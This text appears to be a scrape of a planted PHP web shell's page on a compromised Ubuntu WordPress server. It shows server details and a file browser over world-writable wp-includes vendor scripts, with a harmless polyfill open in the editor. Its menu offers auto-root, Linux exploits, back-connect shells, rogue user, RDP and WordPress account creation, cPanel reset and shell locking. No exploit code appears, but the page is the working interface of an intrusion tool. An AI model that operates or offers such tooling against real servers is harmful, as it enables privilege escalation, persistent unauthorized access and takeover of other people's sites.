Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
blog /
wp-includes /
js /
dist /
vendor /
[ HOME SHELL ]
Name
Size
Permission
Action
lodash.js
527.2
KB
-rw-rw-rw-
lodash.min.js
71.51
KB
-rw-rw-rw-
moment.js
143.42
KB
-rw-rw-rw-
moment.min.js
50.47
KB
-rw-rw-rw-
react-dom.js
709.42
KB
-rw-rw-rw-
react-dom.min.js
97.66
KB
-rw-rw-rw-
react.js
95.93
KB
-rw-rw-rw-
react.min.js
11.54
KB
-rw-rw-rw-
wp-polyfill-element-closest.js
895
B
-rw-rw-rw-
wp-polyfill-element-closest.mi...
417
B
-rw-rw-rw-
wp-polyfill-fetch.js
14.46
KB
-rw-rw-rw-
wp-polyfill-fetch.min.js
7.74
KB
-rw-rw-rw-
wp-polyfill-formdata.js
9.41
KB
-rw-rw-rw-
wp-polyfill-formdata.min.js
7
KB
-rw-rw-rw-
wp-polyfill-node-contains.js
531
B
-rw-rw-rw-
wp-polyfill-node-contains.min....
353
B
-rw-rw-rw-
wp-polyfill.js
225
KB
-rw-rw-rw-
wp-polyfill.min.js
93.94
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : wp-polyfill-element-closest.js
// element-closest | CC0-1.0 | github.com/jonathantneal/closest (function (ElementProto) { if (typeof ElementProto.matches !== 'function') { ElementProto.matches = ElementProto.msMatchesSelector || ElementProto.mozMatchesSelector || ElementProto.webkitMatchesSelector || function matches(selector) { var element = this; var elements = (element.document || element.ownerDocument).querySelectorAll(selector); var index = 0; while (elements[index] && elements[index] !== element) { ++index; } return Boolean(elements[index]); }; } if (typeof ElementProto.closest !== 'function') { ElementProto.closest = function closest(selector) { var element = this; while (element && element.nodeType === 1) { if (element.matches(selector)) { return element; } element = element.parentNode; } return null; }; } })(window.Element.prototype);
Close